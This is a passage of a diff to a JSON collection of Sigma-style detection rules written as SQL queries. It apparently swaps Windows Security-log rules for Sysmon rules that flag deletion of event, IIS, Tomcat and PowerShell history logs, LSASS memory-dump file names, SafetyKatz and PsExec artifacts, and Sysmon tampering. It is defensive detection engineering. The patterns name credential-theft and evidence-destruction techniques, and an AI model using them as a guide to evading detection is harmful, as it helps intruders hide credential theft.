"attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Legitimate usage of SDelete" + "There are no known false positives at this time" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - 
"author": "@neu5ron", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Add or Remove Computer from DC", - "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", - "author": "frack113", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_add_remove_computer.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Failed Code Integrity Checks", - "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "status": "stable", - "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. 
This could be a sign of tampered binaries.", - "author": "Thomas Patzke", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "status": "experimental", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.001" + "attack.t1070" ], "falsepositives": [ - "Disk device errors" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" ], - "filename": "win_security_susp_codeintegrity_check_failure.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "During uninstallation of the IIS service", + 
"During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "Scheduled Task Deletion", - "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", "status": "experimental", - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", - "author": "David Strassegger, Tim Shelton", + "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", + "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Software installation" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scheduled_task_deletion.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "TeamViewer Log File Deleted", + "id": "b1decb61-ed83-4339-8e95-53ea51901720", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue 
LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "file_delete_win_delete_teamviewer_logs.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": 
"file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Remote Task 
Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Possible FP during log rotation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. 
It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE 
'%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "status": "experimental", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Metasploit SMB Authentication", - 
"id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + 
"Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": 
"571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "status": "test", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.001" 
@@ -714,3912 +735,3454 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "title": "PsExec Service File Creation", + "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "status": "test", - "description": "detects execution of 
psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_tool_psexec.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege 